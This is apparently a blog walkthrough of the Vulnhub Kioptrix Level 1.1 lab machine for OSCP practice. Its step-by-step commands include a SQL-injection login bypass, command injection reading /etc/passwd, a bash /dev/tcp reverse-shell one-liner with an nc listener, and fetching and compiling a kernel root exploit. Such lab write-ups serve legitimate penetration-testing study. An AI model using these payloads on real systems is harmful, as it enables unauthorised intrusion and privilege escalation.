Kioptrix Level 1.1 2

Vulnhub virtual machine; On the path to OSCP this box offered SQL-injection for login and a client side web application that was able to be manipulated to give a foothold to box. Classic enumeration of box to compile a priv-esc.

Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.


Find target on network

netdiscover -r


Nmap Scan

nmap -sC -sV -oA nmap/kio2

searchsploit search

searchsploit 2.0.52

DoS is not useful in this scenario.

Navigate to webpage

Test for SQL injection username: admin' OR '1=1--

Successful injection! We are now face with some sort of client side PING tester.

Testing a ping for localhost

Looks like we have successful command execution on box.

Remote Code Execution

Attempt to grab the passwd file by submitting:

1; cat /etc/passwd


1; whoami

we are ‘apache’.

Reverse Shell

Setup Listener on port 9000

nc -lvnp 9000

Attempt to setup a reverse connection with an easy one liner /bin/bash -i >& /dev/tcp/[ip_address]/[port] 0>&1

how it works: *bash -i>&*: invoke bash with an interactive option */dev/tcp/[localhost]/9000*: redirect the session with the /dev/tcp device file *0>&1*: use the standard output and redirect it to the standard input

connection established to box and we are ‘apache’.

Upgrade Half Shell to Full Shell Test for which python

python -c 'import pty; pty.spawn("/bin/bash")'
press cntl+z 
stty raw -echo
fg (enter)


Investigate the environment

Running CentOS release 4.5 and Linux 2.6.9-55

check searchsploit for vulnerabilties:

searchsploit 2.6.x CentOS

Interesting hit with Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10)

Mirror exploit to directory

searchsploit -m exploits/linux/local/9545.c

Investigate/search for any random shell code and replace if needed.

Get file over to target box with a SimpleHTTPServer

python -m SimpleHTTPServer

Save file to memory of box as a good habit located at: /dev/shm

Compile on box:

gcc -o exploit 9545.c

Change the chmod of the file chmod 755 exploit


Execute exploit


Bring me the root!